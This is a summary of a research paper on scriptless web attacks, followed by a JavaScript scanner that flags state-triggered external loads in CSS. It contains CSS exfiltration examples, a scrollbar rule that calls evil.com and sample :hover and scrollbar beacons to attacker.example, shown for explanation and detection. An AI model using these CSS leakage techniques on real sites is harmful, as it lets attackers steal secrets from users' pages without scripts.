SCRIPTLESS ATTACKS: STEALING THE PIE WITHOUT TOUCHING THE SILL

BACKGROUND
• XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.
• As popular applications like Skype, Outlook, Thunderbird and Windows 8 are using HTML, security extensions like NoScript are being adopted by users.
• Given all these defense strategies, we expect that attackers will move towards developing "Scriptless Attacks", which achieve the same goal as XSS attacks without using any scripting.

BEYOND SCRIPT-BASED ATTACKS
• Assumptions:
  • The attacker can inject arbitrary data into the DOM rendered by the browser.
  • We assume that scripting is completely disabled.
• The following browser features are useful building blocks in constructing attacks:
  • Web fonts based on SVG and WOFF: attackers employ these fonts and utilize their features to vary the properties of displayed website content.
  • CSS-based animations: with CSS-based animations, it is possible to change a wide range of CSS and DOM properties over time without using any script code.

ATTACK COMPONENTS
• The CSS content property
  • CSS allows the use of a property called content to extract arbitrary attribute values and display the value either before, after, or instead of the selected element:

    a[href^="http://"]:after { content: attr(href) }

• CSS media queries

    <style type="text/css">
    @media screen and (min-width: 401px) {
      * { background: green; }
      body:after { content: 'larger view port' }
    }
    @media screen and (max-width: 400px) {
      * { background: red; }
      body:after { content: 'smaller view port' }
    }
    </style>

MEASUREMENT-BASED CONTENT EXFILTRATION USING SMART SCROLLBARS
• To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in the section above.

    <div id="s">secret</div>
    <style type="text/css">
    div#s::-webkit-scrollbar-track-piece:vertical:increment {
      background: red url(//evil.com?s);
    }
    </style>

• To mitigate this attack:
  • it is recommended to treat scrollbar backgrounds and scrollbar state backgrounds equally;
  • all background images and similar external resources should be loaded during page load and not on appearance or state occurrence.

MITIGATION TECHNIQUES
• We conclude that several layers of protection are necessary to effectively and holistically defend against CSS-, SVG- and HTML-based data leakage:
  1. Content Security Policy (CSP)
  2. Detecting Detached Views
  3. Miscellaneous Defense Techniques

CONCLUSION
• While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.
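The scrollbar mitigation above boils down to one rule: an external resource must not be fetched only because a UI state (a scrollbar piece, :hover, a viewport-dependent media query) became active. The following added example, not from the paper, is a small static scan that flags exactly that pattern in injected or untrusted CSS; it assumes flat "selector { declarations }" rules without comments or strings containing braces, and the stylesheet and hostnames are constructed for the demo. It goes slightly beyond the slide by also flagging external loads inside @media blocks, since those leak viewport size the same way.

```javascript
// Selectors whose match depends on user interaction or rendering state,
// so a url() inside them is fetched "on appearance", not at page load.
const STATE_SELECTORS = [
  /::?-webkit-scrollbar/i,                              // scrollbar pieces/states
  /:(hover|active|focus|checked|visited|target)\b/i,    // user-driven pseudo-classes
];
// url() pointing at another origin (scheme-relative or absolute http/https).
const EXTERNAL_URL = /url\(\s*['"]?\s*(?:https?:)?\/\//i;

// Minimal rule splitter: returns {selector, body, inMedia} for each rule,
// descending into @media blocks and noting that the rule is conditioned.
function parseRules(css) {
  const rules = [];
  const stack = [];   // open block headers (selectors or at-rule preludes)
  let buf = '';
  for (const ch of css) {
    if (ch === '{') { stack.push(buf.trim()); buf = ''; }
    else if (ch === '}') {
      const header = stack.pop();
      if (header && !header.startsWith('@')) {
        rules.push({ selector: header, body: buf.trim(),
                     inMedia: stack.some(h => h.startsWith('@media')) });
      }
      buf = '';
    } else { buf += ch; }
  }
  return rules;
}

// Flags rules that load an external resource only under a state or media
// condition; plain page-load loads (e.g. body background) are not flagged.
function findStateTriggeredLoads(css) {
  const findings = [];
  for (const r of parseRules(css)) {
    const stateful = STATE_SELECTORS.some(re => re.test(r.selector));
    if (EXTERNAL_URL.test(r.body) && (stateful || r.inMedia)) {
      findings.push({ selector: r.selector,
                      reason: stateful ? 'state-dependent selector' : 'media-query conditioned' });
    }
  }
  return findings;
}

// Constructed sample stylesheet: one benign page-load background, one
// scrollbar-state exfiltration rule, one :hover beacon, one harmless @media rule.
const SAMPLE_CSS = `
  body { background: #fff url(//cdn.example/bg.png); }
  div#s::-webkit-scrollbar-track-piece:vertical:increment { background: red url(//attacker.example?s); }
  a:hover { background: url(https://attacker.example/h); }
  @media screen and (max-width: 400px) { body:after { content: 'smaller' } }
`;

module.exports = { parseRules, findStateTriggeredLoads, SAMPLE_CSS };
```

Running findStateTriggeredLoads(SAMPLE_CSS) reports the scrollbar rule and the :hover rule and leaves the body background alone.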